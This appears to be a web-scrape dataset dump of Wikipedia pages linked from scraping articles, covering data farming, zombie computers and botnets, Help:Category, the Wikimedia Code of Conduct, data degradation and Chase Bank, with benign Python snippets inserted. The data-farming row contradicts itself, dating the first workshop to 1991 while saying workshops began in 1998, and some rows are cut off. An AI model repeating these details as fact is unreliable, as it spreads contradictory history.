Many of the classic experiment designs can be used in simulation studies. However, computational experiments have far fewer restrictions than do real-world experiments, in terms of costs, number of factors, time required, ability to replicate, ability to automate, etc. Consequently, a framework specifically oriented toward large-scale simulation experiments is warranted. People have been conducting computational experiments for as long as computers have been around. The term “data farming” is more recent, coined in 1998 4 in conjunction with the Marine Corp's Project Albert, 5 in which small agent-based distillation models (a type of stochastic simulation) were created to capture specific military challenges. These models were run thousands or millions of times at the Maui High Performance Computer Center 6 and other facilities. Project Albert analysts would work with the military subject matter experts to refine the models and interpret the results. Initially, the use of brute-force full factorial (gridded) designs meant that the simulations needed to run very quickly and the studies required high-performance computing. Even so, only a small number of factors (at a limited number of levels) could be investigated, due to the curse of dimensionality. The SEED Center for Data Farming 7 at the Naval Postgraduate School 8 also worked closely with Project Albert in model generation, output analysis, and the creation of new experimental designs to better leverage the computing capabilities at Maui and other facilities. 
Recent breakthroughs in designs specifically developed for data farming can be found in 9 10 among others. A series of international data farming workshops have been held since 1998 by the SEED Center for Data Farming. 11 International Data Farming Workshop 1 occurred in 1991, and since then 16 more workshops have taken place. The workshops have seen a diverse array of representation from participating countries, such as Canada, Singapore, Mexico, Turkey, and the United States. 12 The International Data Farming Workshops operate through collaboration between various teams of experts. The most recent workshop held in 2008 saw over 100 teams participating. The teams of data farmers are assigned a specific area of study, such as robotics, homeland security, and disaster relief. Different forms of data farming are experimented with and utilized by each group, such as the Pythagoras ABM, the Logistics Battle Command model, and the agent-based sensor effector model (ABSEM). 12 |
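To make the idea of "growing" data with a designed experiment concrete, here is a minimal sketch in Python using pandas (imported earlier in this notebook). The toy_simulation model, its two factors, and the chosen factor levels are invented for illustration; they stand in for whatever simulation model a data farmer would actually run.

import itertools
import random
import pandas as pd

def toy_simulation(arrival_rate, service_rate, seed=0):
    # A stand-in stochastic model: returns an average queue length
    rng = random.Random(seed)
    queue, total = 0, 0
    for _ in range(1000):
        queue += rng.random() < arrival_rate                 # a customer may arrive
        queue -= queue > 0 and rng.random() < service_rate   # one may be served
        total += queue
    return total / 1000

# Full-factorial design over two factors, with three replicates per design point
design = itertools.product([0.2, 0.5, 0.8], [0.3, 0.6, 0.9], range(3))
rows = [{"arrival_rate": a, "service_rate": s, "replicate": r,
         "mean_queue": toy_simulation(a, s, seed=r)} for a, s, r in design]
farmed_data = pd.DataFrame(rows)
print(farmed_data.groupby(["arrival_rate", "service_rate"])["mean_queue"].mean())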
145 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Zombie_(computing) | In computing, a zombie is a computer connected to the Internet that has been compromised by a hacker via a computer virus, computer worm, or trojan horse program and can be used to perform malicious tasks under the remote direction of the hacker. Zombie computers often coordinate together in a botnet controlled by the hacker, and are used for activities such as spreading e-mail spam and launching distributed denial-of-service attacks (DDoS attacks) against web servers. Most victims are unaware that their computers have become zombies. The concept is similar to the zombie of Haitian Voodoo folklore, which refers to a corpse resurrected by a sorcerer via magic and enslaved to the sorcerer's commands, having no free will of its own. 1 A coordinated DDoS attack by multiple botnet machines also resembles a "zombie horde attack", as depicted in fictional zombie films. Zombie computers have been used extensively to send e-mail spam; as of 2005, an estimated 50 80% of all spam worldwide was sent by zombie computers. 2 This allows spammers to avoid detection and presumably reduces their bandwidth costs, since the owners of zombies pay for their own bandwidth. This spam also greatly increases the spread of Trojan horses, as Trojans are not self-replicating. They rely on the movement of e-mails or spam to grow, whereas worms can spread by other means. 3 For similar reasons, zombies are also used to commit click fraud against sites displaying pay-per-click advertising. Others can host phishing or money mule recruiting websites. Zombies can be used to conduct distributed denial-of-service (DDoS) attacks, a term which refers to the orchestrated flooding of target websites by large numbers of computers at once. The large number of Internet users making simultaneous requests of a website's server is intended to result in crashing and the prevention of legitimate users from accessing the site. 4 A variant of this type of flooding is known as distributed degradation-of-service. Committed by "pulsing" zombies, distributed degradation-of-service is the moderated and periodical flooding of websites intended to slow down rather than crash a victim site. The effectiveness of this tactic springs from the fact that intense flooding can be quickly detected and remedied, but pulsing zombie attacks and the resulting slow-down in website access can go unnoticed for months and even years. 5 The computing facilitated by the Internet of Things (IoT) has been productive for modern-day usage, yet it has played a significant role in the increase in web attacks. The potential of IoT enables every device to communicate efficiently, but this also intensifies the need for policy enforcement regarding security threats. Among these threats, Distributed Denial-of-Service (DDoS) attacks are prevalent. Research has been conducted to study the impact of such attacks on IoT networks and to develop compensating provisions for defense. 6 Consultation services specialized in IoT security, such as those offered by IoT consulting firms, play a vital role in devising comprehensive strategies to safeguard IoT ecosystems from cyber threats. Notable incidents of distributed denial- and degradation-of-service attacks in the past include the attack upon the SPEWS service in 2003, and the one against Blue Frog service in 2006. In 2000, several prominent Web sites (Yahoo, eBay, etc.) 
were clogged to a standstill by a distributed denial-of-service attack mounted by 'MafiaBoy', a Canadian teenager. Beginning in July 2009, similar botnet capabilities also emerged for the growing smartphone market. Examples include the July 2009 in-the-wild release of the Sexy Space text message worm, the world's first botnet-capable SMS worm, which targeted the Symbian operating system in Nokia smartphones. Later that month, researcher Charlie Miller revealed a proof-of-concept text message worm for the iPhone at Black Hat Briefings. Also in July, United Arab Emirates consumers were targeted by the Etisalat BlackBerry spyware program. In the 2010s, the security community was divided as to the real-world potential of mobile botnets. But in an August 2009 interview with The New York Times, cyber security consultant Michael Gregg summarized the issue this way: "We are about at the point with smart phones that we were with desktops in the '80s." 7 |
146 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Help:Category | Categories are intended to group together pages on similar subjects. They are implemented by a MediaWiki feature that adds any page with a text like Category:XYZ in its wiki markup to the automated listing that is the category with name XYZ. Categories help readers to find, and navigate around, a subject area, to see pages sorted by title, and to thus find article relationships. Categories are normally found at the bottom of an article page. Clicking a category name brings up a category page listing the articles (or other pages) that have been added to that particular category. There may also be a section listing the subcategories of that category. The subcategorization feature makes it possible to organize categories into tree-like structures to aid navigation. The term category does refer to both the title of a category page—the category pagename—and the category itself. Keeping this in mind while reading about categorization, plus learning a category page layout is a worthwhile investment in research techniques. (See also the search box parameter "incategory".) The layout of a category page is mostly text, but see about displaying category trees below. The MediaWiki software maintains tables of categories, to which any editable page can be added. To add a page to a category, include Category:Category name or Category:Category name Sortkey in that page's wiki markup. The categories to which a page belongs appear in a box at the bottom of the page. A category is usually associated with a category page in the "Category: namespace. 1 A category page contains text that can be edited, like any other page, but when the page is displayed, the last part of what is displayed is an automatically generated list of all pages in that category, in the form of links. Other category pages which appear in this list are treated separately, as subcategories. A category page is any page in the Category namespace. They each act as a category, and are termed a "category". The category page has one section titled Subcategories listing other "categories", and one section titled Pages, listing pages as categorized (in other namespaces). New categories are created by creating a page in the Category namespace. A category page can be edited like any other page. However, when it is displayed, the editable part of the page is followed by automatically generated lists of pages belonging to the category, as follows: The items in the lists all link to the pages concerned; in the case of the images this applies both to the image itself and to the text below it (the name of the image). For the way in which the lists are ordered, see Sorting category pages below. The first and second lists are divided into sections, according to the first character of the sort key. These initial characters are displayed above the sections. To suppress these, make all sort keys start with a space. A category page can only display a limited number of items (currently 200). If more pages belong to the category, there will be a link to the next ones. The categories box for the category page appears at the bottom, in the same place as for other pages. This contains the categories to which the current category page has been added, i.e., its parent categories (the categories of which it is a subcategory). Add a category page to other categories in the normal way, using the Category:Category name or Category:Category name Sortkey syntax. 
A page becomes part of a category if the page's wiki markup contains a declaration for that category. A category declaration takes the form Category:Category name or Category:Category name Sortkey . The declaration must be processed, i.e. it will not work if it appears between nowiki ... nowiki or includeonly ... includeonly tags, or in a comment. The declaration may however come from a transcluded page; see Categories and templates below. A category name can be any string that would be a legitimate page title. If the category name begins with a lower-case letter, it will be capitalized. For initial lower-case letters, as in Category:macOS, see the technical restrictions page. On Wikipedia, it is customary to place category declarations at the end of the wiki markup, but before any stub templates (which themselves transclude categories) and interlanguage links. When a page has been added to one or more categories, a categories box appears at the bottom of the page (or possibly elsewhere, if a non-default skin is being used). This box contains a list of the categories the page belongs to, in the order in which the category declarations appear in the processed wiki markup. The category names are linked to the corresponding category pages. They appear as red links if the corresponding category page does not exist. If a user has enabled the HotCat gadget, the categories box will also provide links to quickly add, remove, or modify category declarations on the page, without having to edit the whole page. Hidden categories are not displayed, except as described below under Hiding categories. The following subsections are ordered from simple actions to more elaborate or rarer actions. To link to a category page without putting the current page in that category, precede the link with a colon: :Category:Category name . Such a link can be piped like a normal wikilink. (The cl template, and others listed on its documentation page, may sometimes be helpful.) Raw information about the members of a category, their sort keys and timestamps (time when last added to the category) can be obtained from the API, using a query of the form: Listings of up to 500 members are possible. If there are more members then the results will include text near the end like this: categorymembers cmcontinue "page NNNN TITLE" . This can be added to the previous one, without quotation marks, for the next page of members: ... cmcontinue page NNNN TITLE By default, a page is sorted under the first character of its name, without the namespace. English Wikipedia groups accented characters together with their unaccented version, so pages starting with , , , will be listed under heading A. Sorting is case-insensitive, so "ABC" comes after "Abacus". Unlike at Special:Allpages and Special:Prefixindex, a space is treated as a space (coming before all other characters), not as an underscore. The English Wikipedia has numerical sorting in categories. This means a page whose title begins with a number will be sorted according to the numeric value of the number (even if it is multiple digits). Thus "9 dogs", "25 dogs", and "112 dogs" will all appear under the "0 9" heading in numeric order. If the number includes a comma, space, or period, the sorting algorithm will only consider the part of the number before the separator. Each of the three lists (subcategories, pages, media files) is arranged in the order explained above (except that, in the subcategories list, the namespace indicator "Category: is not considered). 
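Since this notebook already queries Wikipedia with requests, the category-membership listing described above can also be retrieved programmatically. The sketch below is one possible way to call the public MediaWiki action API (list=categorymembers) and follow its cmcontinue continuation; the category name in the usage comment is only an example.

import requests

API_URL = "https://en.wikipedia.org/w/api.php"

def category_members(category, limit=500):
    # Yield member page titles of a category, following API continuation
    params = {
        "action": "query",
        "list": "categorymembers",
        "cmtitle": category,               # e.g. "Category:1879 births"
        "cmlimit": limit,
        "cmprop": "title|sortkey|timestamp",
        "format": "json",
    }
    while True:
        data = requests.get(API_URL, params=params, timeout=10).json()
        for member in data["query"]["categorymembers"]:
            yield member["title"]
        if "continue" not in data:         # no further pages of results
            break
        params.update(data["continue"])    # carries cmcontinue into the next request

# Example usage:
# for title in category_members("Category:1879 births"):
#     print(title)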
If an item ought to be positioned within a list on the basis of an alternative name (sort key) for that item, then this can be specified in the category tag that places the item in the list: For example, to add an article called Albert Einstein to Category:1879 births and have the article sorted by "Einstein, Albert", you would type: Unlike a piped link (which uses the same syntax), the sort key itself is not displayed to readers. It affects only the order in which pages are listed on the category page. It is useful to document the system being used for sort keys on the category page. For guidelines about the use of sort keys on Wikipedia, see WP:SORTKEY. It is possible to set a default sort key which is different from PAGENAME by using the magic word DEFAULTSORT: : This is often used in biography articles, to make sure the subject is sorted by their last name: For example, on the Albert Einstein page, DEFAULTSORT:Einstein, Albert adds the sort key "Einstein, Albert" to all his categories, such as Category:1879 births. In the case of multiple default sort key tags, the last DEFAULTSORT on the final rendering of a page applies for all categories, regardless of the position of the category tags. This also means that a DEFAULTSORT tag included from a template is not effective if another DEFAULTSORT tag occurs later on the page, even if the later DEFAULTSORT tag is also "hidden" (included by another template). If a category is added inside ref ... ref then DEFAULTSORT may be ignored. In addition to browsing through hierarchies of categories, it is possible to use the search tool to find specific articles in specific categories. To search for articles in a specific category, type incategory:"CategoryName" in the search box. A pipe can be added to join the contents of one category with the contents of another. For example, enter to return all pages that belong to either (or both) of the categories, as here. Note that using search to find categories will not find articles which have been categorized using templates. This feature also doesn't return pages in subcategories. Special:Categories provides an alphabetic list of all categories, with the number of members of each; this number does not include the content of the subcategories, but it includes the subcategories themselves, i.e., each counting as one. The above list contains all categories that have members, regardless of whether they have corresponding category pages. To list all existing category pages (regardless of whether they have members), use Special:AllPages Category:. As described at mw:Help:Magic words, PAGESINCATEGORY:Example or PAGESINCAT:Example returns the number of pages in "Category:Example". Each subcategory counts as one page; pages in subcategories are not counted. The page Special:CategoryTree enables you to see the tree structure of a category (its subcategories, their subcategories and so on; the display of files and other member pages is optional). The CategoryTree extension can be used to display such a tree on any page. (This is sometimes done on the category page itself, if the category is split over multiple screens, to make all subcategories available on every screen.) The basic syntax is to display just the subcategory tree, and to display member pages as well. They will be indicated by italics. Dapete's category-visualizer vCat will render charts of the tree structure. You may also use Template:Category tree or Template:Category tree all, instead. 
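The incategory: search keyword described above is also exposed through the same action API (list=search), subject to the caveats already noted (template-based categorization and subcategories are not covered). The following is a small hedged sketch; the category name in the usage comment is a placeholder.

import requests

API_URL = "https://en.wikipedia.org/w/api.php"

def search_in_category(category_name, extra_terms=""):
    # Search pages in a category via the search API's incategory: keyword
    query = f'incategory:"{category_name}" {extra_terms}'.strip()
    params = {
        "action": "query",
        "list": "search",
        "srsearch": query,
        "srlimit": 50,
        "format": "json",
    }
    data = requests.get(API_URL, params=params, timeout=10).json()
    return [hit["title"] for hit in data["query"]["search"]]

# Example usage:
# print(search_in_category("Cannabis stubs"))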
Warning: Categories can be moved in the same way as an ordinary page; but a certain amount of cleanup may be necessary. A redirect is left at the old category name, and this is not a normal REDIRECT ... but a category redirect . Once all the pages have been moved out of the old category, it may be left as a category redirect or deleted. For categories entirely populated through templates (see above), modifying the templates enables all affected articles to be moved to another category, but with the refresh problem mentioned. Almost all category name changes are made pursuant to a consensus decision at Wikipedia:Categories for discussion. Do not create intercategory redirects other than with a category redirect template. See Wikipedia:Categories for discussion Redirecting categories for more on category redirects. When the magic word HIDDENCAT is placed on a category page, that category becomes hidden, meaning that it will not be displayed on the pages belonging to that category. On Wikipedia, the magic word is not normally used explicitly, but is applied through the hidden category template. The feature is mostly used to prevent project maintenance categories from showing up to ordinary readers on article pages. For users who are not logged in, hidden categories are displayed on category pages (whether as parent categories or subcategories). Hidden categories are displayed at the bottom of each page, after "Hidden categories: , for registered users: Hidden categories are automatically added to Category:Hidden categories. For guidelines on the hiding of categories on Wikipedia, see WP:HIDDENCAT. The most effective way of finding entries of a category is using the "What links here" tool on the category's main article. An easy way to find relevant articles for a new category or missing entries in an existing one is by finding the most relevant list and checking its entries. Sometimes categories are about things that are intersections of other categories for which the PetScan tool can be used. More relevant articles may also be found linked in a category's main article and the articles already featured in the category especially in their "See also" sections (if existent) and the automatically suggested "RELATED ARTICLES" below them. Furthermore, a category's superordinate categories often feature articles that should be subcategorized to the category. Other ways to find relevant articles include searching Wikipedia for the category's topic and searching the Web for the topic in quotes (with synonyms also in quotes and appended after an OR) and appending the word wiki or Wikipedia or site:Wikipedia.org to them. Templates are categorized the same way as articles, except that Category: Some-topic templates should be placed on the template's documentation page (or inside noinclude ... noinclude tags, if there is no documentation page), this is necessary to avoid categorizing pages by template inclusion (see below). A template can be used to add pages to a category, usually by placing the category link inside includeonly includeonly tags on the template (e.g. includeonly Category:category name includeonly ). When the template is transcluded into the page, the category link becomes active, and the page is added to the category page. This is useful for categories that have high turnover or many pages included, like cleanup categories. Changes to the template, however, may not be reflected immediately on the category page. 
When you edit an article to add a category tag directly, the list of category members is updated immediately when the page is saved. When a category link is contained in a template, however, this does not happen immediately: instead, whenever a template is edited, all the pages that transclude it are put into the job queue to be recached during periods of low server load. This means that, in busy periods, it may take hours or even days before individual pages are recached and they start to appear in the category list. Performing a null edit to a page will allow it to jump the queue and be immediately recached. To add the template itself to the category page as well, omit the "includeonly" tags. To add the template to a category without categorizing pages on which the template is transcluded, place the category declaration between noinclude ... noinclude tags, or add it to the template documentation page between includeonly includeonly (the latter allows recategorizing the template without editing it, which is helpful if it is protected, or so complicated that mere mortals hesitate to touch it). Parser functions can be used to make the transcluded categories, or the sort key used in them, dependent on other variables, notably PAGENAME. On Wikipedia it is not recommended that templates be used to populate ordinary content categories of articles. See Categorization using templates in the categorization guideline. Redirect pages can be categorized and there are conventions on how to do it. The redirect link must be first on the page. On a category page, redirects are listed in italics. For a category, the "Related Changes" feature, when applied to the corresponding category page, lists recent changes to the pages which are currently listed as belonging to a category. Where those pages are subcategories or image pages, only changes to their editable parts are listed. Notice that "Related Changes" does not show edits to pages that have been removed from the category. Also, "Related Changes" does not list recent changes to pages linked from the editable part of the category page (as it would normally, with a non-category page). If a workaround would be required, the links in question could be placed in a template and transcluded onto the category page. As usual unlike with watchlists recent changes to corresponding talk pages are not shown under "Related Changes". Pages one is watching are bolded on the list. This can help to find which pages in a given category one has on one's watchlist. The DynamicPageList (third-party) extension provides a list of last edits to the pages in a category, or optionally, just the list of pages; the simpler DynamicPageList (Wikimedia) is installed on Meta, Wikinews, Wikibooks and Wikiversity; the extension mw:Extension:DPLforum is installed on Wikia. Since 2016, additions and removals from categories are available via the "Category changes" filter on recent changes pages, including watchlists and Special:RecentChangesLinked. For example, category changes to articles in Category:Cannabis stubs can be found here. You can monitor additions and removals from specific categories by adding the categories to your watchlist and making sure the "Category changes" filter is active. You can view changes to categories in your watchlist by clicking here. Additional scripts with similar functionality are User:CategoryWatchlistBot and User:Ais523 catwatch. |
147 | https://en.wikipedia.org/wiki/Data_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Universal_Code_of_Conduct | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project.Per resolution by the Foundation's Board, the Universal Code of Conduct (UCoC) applies to all Wikimedia projects and spaces as well as Foundation activities, including events it hosts and events it funds or supports with other resources. We believe in empowering as many people as possible to actively participate in Wikimedia projects and spaces, to reach our vision of a world in which everyone can share in the sum of all human knowledge. We believe our communities of contributors should be as diverse, inclusive, and accessible as possible. We want these communities to be positive, safe and healthy environments for anyone who joins (and wants to join) them. We are committed to ensuring that it remains so, including by embracing this Code of Conduct and revisiting for updates as needed. Also, we wish to protect our projects against those who damage or distort the content. In line with the Wikimedia mission, all who participate in Wikimedia projects and spaces will: This Universal Code of Conduct (UCoC) defines a minimum set of guidelines of expected and unacceptable behaviour. It applies to everyone who interacts and contributes to online and offline Wikimedia projects and spaces. This includes new and experienced contributors, functionaries within the projects, event organizers and participants, employees and board members of affiliates and employees and board members of the Wikimedia Foundation. It applies to all Wikimedia projects, technical spaces, in-person and virtual events, as well as the following instances: The Universal Code of Conduct provides a baseline of behaviour for collaboration on Wikimedia projects worldwide. Communities may add to this to develop policies that take account of local and cultural context, while maintaining the criteria listed here as a minimum standard. The Universal Code of Conduct applies equally to all Wikimedians without any exceptions. Actions that contradict the Universal Code of Conduct can result in sanctions. These may be imposed by designated functionaries (as appropriate in their local context) and or by the Wikimedia Foundation as the legal owner of the platforms. Every Wikimedian, whether they are a new or experienced editor, a community functionary, an affiliate or Wikimedia Foundation board member or employee, is responsible for their own behaviour. In all Wikimedia projects, spaces and events, behaviour will be founded in respect, civility, collegiality, solidarity and good citizenship. This applies to all contributors and participants in their interaction with all contributors and participants, without exceptions based on age, mental or physical disabilities, physical appearance, national, religious, ethnic and cultural background, caste, social class, language fluency, sexual orientation, gender identity, sex or career field. Nor will we make exceptions based on standing, skills or accomplishments in the Wikimedia projects or movement. We expect all Wikimedians to show respect for others. In communicating with people, whether in online or offline Wikimedia environments, we will treat each other with mutual respect. 
This includes but is not limited to: We strive towards the following behaviours: This includes but is not limited to: The Universal Code of Conduct aims to help community members identify situations of bad behaviour. The following behaviours are considered unacceptable within the Wikimedia movement: This includes any behaviour intended primarily to intimidate, outrage or upset a person, or any behaviour where this would reasonably be considered the most likely main outcome. Behaviour can be considered harassment if it is beyond what a reasonable person would be expected to tolerate in a global, intercultural environment. Harassment often takes the form of emotional abuse, especially towards people who are in a vulnerable position, and may include contacting workplaces or friends and family members in an effort to intimidate or embarrass. In some cases, behaviour that would not rise to the level of harassment in a single case can become harassment through repetition. Harassment includes but is not limited to: Abuse occurs when someone in a real or perceived position of power, privilege, or influence engages in disrespectful, cruel, and or violent behaviour towards other people. In Wikimedia environments, it may take the form of verbal or psychological abuse and may overlap with harassment. Deliberately introducing biased, false, inaccurate or inappropriate content, or hindering, impeding or otherwise hampering the creation (and or maintenance) of content. This includes but is not limited to: |
148 | https://en.wikipedia.org/wiki/Data_scraping | https://developer.wikimedia.org | Find technical documentation and connect with the developer community behind Wikipedia and other Wikimedia projects. Access articles from Wikipedia, media files, structured data, and more with public APIs and downloads. Tools and bots make it easier to edit and maintain Wikimedia projects. Help build the Wikimedia ecosystem with open source software. Get involved with the Wikimedia technical community, and find opportunities for support and learning. Find resources to help with questions and troubleshooting. |
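The public APIs advertised in the row above can be exercised with the same requests-based approach used elsewhere in this notebook. The sketch below calls the Wikimedia REST API page-summary endpoint; the helper name and user-agent string are placeholders.

import requests

def page_summary(title, lang="en"):
    # Fetch the plain-text summary of a page via the Wikimedia REST API
    url = f"https://{lang}.wikipedia.org/api/rest_v1/page/summary/{title}"
    response = requests.get(url, headers={"User-Agent": "ExampleClient/0.1"}, timeout=10)
    response.raise_for_status()
    return response.json().get("extract", "")

# Example usage:
# print(page_summary("Data_scraping"))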
149 | https://en.wikipedia.org/wiki/Web_scraping | https://zh.wikipedia.org/wiki/%E7%BD%91%E9%A1%B5%E6%8A%93%E5%8F%96 | web scraping HTML Web |
150 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_degradation | Data degradation is the gradual corruption of computer data due to an accumulation of non-critical failures in a data storage device. It is also referred to as data decay, data rot or bit rot. 1 This results in a decline in data quality over time, even when the data is not being utilized. Data degradation in dynamic random-access memory (DRAM) can occur when the electric charge of a bit in DRAM disperses, possibly altering program code or stored data. DRAM may be altered by cosmic rays 2 or other high-energy particles. Such data degradation is known as a soft error. 3 ECC memory can be used to mitigate this type of data degradation. 4 Data degradation results from the gradual decay of storage media over the course of years or longer. Causes vary by medium: Below are several digital images illustrating data degradation, all consisting of 326,272 bits. The original photo is displayed first. In the next image, a single bit was changed from 0 to 1. In the next two images, two and three bits were flipped. On Linux systems, the binary difference between files can be revealed using cmp command (e.g. cmp -b bitrot-original.jpg bitrot 1bit-changed.jpg). This deterioration can be caused by a variety of factors that impact the reliability and integrity of digital information, including physical factors, software errors, security breaches, human error, obsolete technology, and unauthorized access incidents. 12 13 14 15 Most disk, disk controller and higher-level systems are subject to a slight chance of unrecoverable failure. With ever-growing disk capacities, file sizes, and increases in the amount of data stored on a disk, the likelihood of the occurrence of data decay and other forms of uncorrected and undetected data corruption increases. 16 Low-level disk controllers typically employ error correction codes (ECC) to correct erroneous data. 17 Higher-level software systems may be employed to mitigate the risk of such underlying failures by increasing redundancy and implementing integrity checking, error correction codes and self-repairing algorithms. 18 The ZFS file system was designed to address many of these data corruption issues. 19 The Btrfs file system also includes data protection and recovery mechanisms, 20 as does ReFS. 21 |
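The single-bit-flip comparison described above (cmp -b on an original file and a corrupted copy) can be reproduced in Python without external tools. The sketch below flips one randomly chosen bit in an in-memory copy and reports the differing byte; the sample payload is arbitrary.

import random

original = bytearray(b"Lorem ipsum dolor sit amet. " * 100)
corrupted = bytearray(original)

# Flip one randomly chosen bit to simulate a single-bit "rot" event
bit_index = random.randrange(len(corrupted) * 8)
corrupted[bit_index // 8] ^= 1 << (bit_index % 8)

# Report which bytes now differ, similar in spirit to `cmp -b`
diffs = [(i, original[i], corrupted[i])
         for i in range(len(original)) if original[i] != corrupted[i]]
print(f"{len(diffs)} byte(s) differ: {diffs}")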
151 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Chase_Bank | JPMorgan Chase Bank, N.A., doing business as Chase, is an American national bank headquartered in New York City that constitutes the consumer and commercial banking subsidiary of the U.S. multinational banking and financial services holding company, JPMorgan Chase. The bank was known as Chase Manhattan Bank until it merged with J.P. Morgan Co. in 2000. 2 Chase Manhattan Bank was formed by the merger of the Chase National Bank and the Manhattan Company in 1955. 3 The bank merged with Chemical Bank New York in 1996 and later merged with Bank One Corporation in 2004 4 and in 2008 acquired the deposits and most assets of Washington Mutual. In May 2023, it acquired the assets of First Republic Bank. Chase offers more than 5,100 branches and 17,000 ATMs nationwide and has 18.5 million checking accounts and 25 million debit card users as of 2023. 5 JPMorgan Chase Co. has 250,355 employees (as of 2016) and operates in more than 100 countries. JPMorgan Chase Co. had assets of $3.31 trillion in 2022 which makes it the largest bank in the United States 6 as well as the bank with the most branches in the United States 7 and the only bank with a presence in all of the contiguous United States. 8 JPMorgan Chase, through its Chase subsidiary, is one of the Big Four banks of the United States. 9 10 The Bank of The Manhattan Company (New York) was founded on September 1, 1799, and continued under that name until 1955, when it merged with the Chase National Bank, which was founded in 1877; the merged bank was called The Chase Manhattan Bank. 11 12 Chase traces its history back to the founding of The Manhattan Company by Aaron Burr on September 1, 1799, in a house at 40 Wall Street: 2 After an epidemic of yellow fever in 1798, during which coffins had been sold by itinerant vendors on street corners, Aaron Burr established the Manhattan Company, with the ostensible aim of bringing clean water to the city from the Bronx River but in fact, designed as a front for the creation of New York's second bank, rivaling Alexander Hamilton's Bank of New York. In 2006, the modern-day Chase bought the retail banking division of the Bank of New York, which then only months later merged with Pittsburgh-based Mellon Financial to form the present-day BNY Mellon. 15 16 : 23 26 Chase National Bank was formed in 1877 by John Thompson. 2 It was named after former United States Treasury Secretary and Chief Justice Salmon P. Chase, 3 although Chase (having died four years earlier) did not have a connection with the bank. 2 The Chase National Bank acquired a number of smaller banks in the 1920s through its Chase Securities Corporation. In 1926, for instance, it acquired Mechanics and Metals National Bank. However, its most significant acquisition was that of the Equitable Trust Company of New York in 1930, the largest stockholder of which was John D. Rockefeller Jr. 17 This made Chase the largest bank in the US and the world. Chase was primarily a wholesale bank dealing with other prominent financial institutions and major corporate clients such as General Electric, 18 : 450 which had, through its RCA subsidiary, leased prominent space and become a crucial first tenant of Rockefeller Center. They rescued that major project in 1930. 
The bank is also closely associated with and has financed the oil industry, having longstanding connections with its board of directors to the successor companies of Standard Oil, especially ExxonMobil, which are also part of Rockefeller holdings. citation needed In 1955, Chase National Bank and The Manhattan Company merged to create the Chase Manhattan Bank. 2 As Chase was a much larger bank, it was first intended that Chase acquire the "Bank of Manhattan", as it was nicknamed, but it transpired that Burr's original charter for the Manhattan Company had not only included the clause allowing it to start a bank with surplus funds, but another requiring unanimous consent of shareholders for the bank to be taken over. The deal was therefore structured as an acquisition by the Bank of the Manhattan Company of Chase National, with John J. McCloy becoming chairman of the merged entity. This avoided the need for unanimous consent by shareholders. For Chase Manhattan Bank's new logo, Chermayeff Geismar designed a stylized octagon in 1961, which remains part of the bank's logo today. 19 It has been reported that the Chase logo was a stylized representation of the primitive water pipes laid by the Manhattan Company, 20 but this story was refuted in 2007 by Ivan Chermayeff himself. According to Chermayeff, the Chase logo was merely intended to be distinctive and geometric, and was not intended at all to resemble a cross-section of a wooden water pipe. 21 According to Chase, the sides of the octagon represent forward motion, while the blank space in the middle suggests progress originates from the center; and is a single unit made up of separate parts, like the bank. 22 The bank included an asset management business called the Chase Investors Management Corporation. Under McCloy's successor, George Champion, the bank relinquished its antiquated 1799 state charter for a modern one. In 1969, under the leadership of David Rockefeller, the bank reorganized as a bank holding company, the Chase Manhattan Corporation. 3 The mergers and acquisitions during this period allowed Chase Manhattan to expand its influence over many non-financial corporations. A 1979 study titled "The Significance of Bank Control over Large Corporations" 23 found that: "The Rockefeller-controlled Chase Manhattan Bank tops the list, controlling 16 companies. In 1985, Chase Manhattan expanded into Arizona by acquiring Continental Bank. 24 In 1991, Chase Manhattan expanded into Connecticut by acquiring two insolvent banks. 25 In August 1995, Chemical Bank of New York and Chase Manhattan Bank announced plans to merge. 26 The merger was completed in August 1996. 27 Chemical's previous acquisitions included Manufacturers Hanover Corporation, in 1991, and Texas Commerce Bank, in 1987. Although Chemical was the nominal survivor, the merged company retained the Chase name since not only was it better known (particularly outside the United States), but also the original charter of Chase required that the name be retained in any future business ventures. Hence, even today, it is known as JPMorgan Chase. In December 2000, the combined Chase Manhattan completed the acquisition of J.P. Morgan Co. in one of the largest banking mergers to date. The combined company was renamed JPMorgan Chase. In 2004, the bank acquired Bank One, making Chase the largest credit card issuer in the United States. JPMorgan Chase added Bear Stearns and Washington Mutual to its acquisitions in 2008 and 2009 respectively. 
After closing nearly 400 overlapping branches of the combined company, less than 10% of its total, Chase will have approximately 5,410 branches in 23 states as of the closing date of the acquisition. 28 29 According to data from SNL Financial (data as of June 30, 2008), this places Chase third behind Wells Fargo and Bank of America in terms of total U.S. retail bank branches. In October 2010, Chase was named in two lawsuits alleging manipulation of the silver market. 30 The suits allege that by managing giant positions in silver futures and options, the banks influenced the prices of silver on the New York Stock Exchange's Comex Exchange since early 2008. The following is an illustration of the company's major mergers and acquisitions and historical predecessors to 1995 (this is not a comprehensive list): The Chemical Bank of New York(est. 1823) Texas Commerce Bank(Formerly Texas National Bank of Commerce)(merged 1864) ManufacturersTrust Company(est. 1905) Hanover Bank(est. 1873) Bank of the Manhattan Company(est. 1799) Chase National Bankof the City of New York(est. 1877) In 2004, JPMorgan Chase merged with Chicago-based Bank One Corp., bringing on board its current chairman and CEO Jamie Dimon as president and COO and designating him as CEO William B. Harrison Jr.'s successor. Dimon's pay was pegged at 90% of Harrison's. Dimon quickly made his influence felt by embarking on a cost-cutting strategy and replaced former JPMorgan Chase executives in key positions with Bank One executives—many of whom were with Dimon at Citigroup. Dimon became CEO in January 2006 and chairman in December 2006 after Harrison's resignation. 31 Bank One Corporation was formed upon the 1998 merger between Banc One of Columbus, Ohio and First Chicago NBD. These two large banking companies were themselves created through the merger of many banks. JPMorgan Chase completed the acquisition of Bank One in Q3 2004. The merger between Bank One and JPMorgan Chase meant that corporate headquarters were now in New York City while the retail bank operations of Chase were consolidated in Chicago. 32 33 The following is an illustration of Bank One's major mergers and acquisitions and historical predecessors (this is not a comprehensive list): City National Bank Trust Company (Columbus, Ohio) Farmers Saving Trust Company First Chicago Corp(est. 1863) NBD Bancorp(Formerly National Bank of Detroit)(est. 1933) Louisiana's FirstCommerce Corp. On September 25, 2008, JPMorgan Chase bought most banking operations of Washington Mutual from the receivership of the Federal Deposit Insurance Corporation (FDIC). 34 : 115 That night, the 